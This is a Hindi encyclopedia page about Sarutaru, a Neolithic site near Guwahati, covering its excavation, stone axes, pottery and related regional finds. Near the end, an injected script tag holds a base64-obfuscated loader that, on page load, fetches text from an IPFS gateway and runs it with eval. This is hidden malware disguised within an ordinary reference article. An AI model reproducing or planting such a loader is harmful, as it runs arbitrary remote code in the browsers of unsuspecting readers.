सरुतरु

भारत डिस्कवरी प्रस्तुति
यहाँ जाएँ:भ्रमण, खोजें

सरुतरु मेघालय राज्य में शिलांग के पठार पर गुवाहाटी से 25 किमी दक्षिण-पूर्व में ब्रह्मपुत्र नदी की सहायक नदी दिगारु के तट पर स्थित है।

  • इस स्थल का उत्खनन सन् 1967 ई. से 1973 ई. के मध्य किया गया।
  • सरुतरु पर एक छोटी पहाड़ी पर चट्टान की गलन से उत्पन्न मिट्टी का जमाव पाया गया है। जिसकी परत पर लगभग 40 सेमी. मोटी नव-प्रस्तरकालीन आवासीय स्तर स्थित था। इस स्तर से स्लेट व बलुए पत्थर से बने नव-प्रस्तर उपकरण प्राप्त हुए हैं। इनमें प्रमुख प्रकार स्कन्धयुक्त व गोल मूँठ वाली कुल्हाड़ियाँ हैं।
  • इस स्थल से प्राप्त मृद्भाण्ड परम्परा दओजली-हैडिंग के समतुल्य ही है।
  • सरुतरु से समरकालीन अर्थव्यवस्था के सम्बन्ध में कोई प्रत्यक्ष प्रमाण प्राप्त नहीं हुए हैं।
  • सरुतरु से एक किमी की दूरी पर स्थित मरकडोला के उत्खनन के आधार पर इस क्षेत्र में नव-प्रस्तर परम्परा को प्रथम शताब्दी ई. तक प्रचलित माना जा सकता है। इसका आधार इस स्थल पर प्राप्त एक मीटर के आवासीय जमाव से प्राप्त मृद्भाण्ड हैं।
  • सरुतरु के निकट अरुणाचल प्रांत में मिशमी पर्वत की घाटी, नागालैण्ड का उत्तरी पर्वतीय क्षेत्र, मिज़ोरममणिपुर के उत्तरपूर्व के सीमांत प्रदेशों में भी नव-प्रस्तरकालीन उपकरण प्राप्त हुए हैं।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

टीका टिप्पणी और संदर्भ

संबंधित लेख